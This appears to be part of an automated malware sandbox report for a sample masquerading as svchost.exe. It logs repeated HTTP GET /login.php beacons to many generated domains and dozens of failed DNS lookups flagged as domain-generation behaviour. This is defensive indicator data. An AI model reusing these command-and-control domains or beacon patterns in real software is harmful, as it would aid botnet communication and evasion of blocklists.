Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?subid1=20240824-0243-071d-8c4b-3f42cf5256c3 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1724431387.5010053 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?sub1=20240824-0243-077d-8f61-d4c58a818681 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1724431387.3029143 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Cookie: btst=ba785a403bc90255316f056071bf01aa\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Cookie: btst=aa184787ed2d77e1f6f59c2dc950863e\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Cookie: vsid=918vr471976932991951418 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Cookie: btst=a03933307436d0e87a275c8dab3cea9f\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Cookie: btst=3bd5de231d5c30f08e390492f5c039b1\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Cookie: sid=a5fae49c-616e-11ef-add0-e1f04491a098 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET / HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww6.galyqaz.com Connection: Keep-Alive Cookie: vsid=918vr471976932991951418 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Content-Length: 6 Cookie: btst=2defa10e06435b44928a9b853377cfec\|8.46.123.33\|1724431347\|1724431347\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source:	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Content-Length: 6 Cookie: btst=d106e65ece3c227125fd2b7f88318a22\|8.46.123.33\|1724431386\|1724431386\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Content-Length: 6 Cookie: __tad=1724431387.3029143 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Content-Length: 6 Cookie: __tad=1724431387.5010053 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1724431387.3029143 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcb HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1724431387.5010053 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: qexysig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzypug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumytup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahynus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyjux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebylov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofydac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupytyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupydig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyriq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufybyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volydot.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyvah.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetytug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvyxil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufymyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purywop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonymuf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofyqit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyrug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopyret.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujymip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galypyh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyfyb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumywaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowydef.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqysag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volykit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonycum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyxul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyrip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacykeh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowybof.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyneh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxymed.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyhis.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyrol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysymux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadypuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyheq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekykup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryxij.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocycuc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexykug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyzef.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyfel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofygum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahykih.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqykab.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvymul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyveg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofykoc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopycom.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykygaj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacykub.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojygok.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowykaf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymyvin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowymyk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyrap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonydik.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofymik.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatycoh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvyjop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purydyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyqih.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegytyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojykom.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopykak.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxylor.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofygaf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymylyr.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedynaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujygaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatydaw.com replaycode: Name error (3)
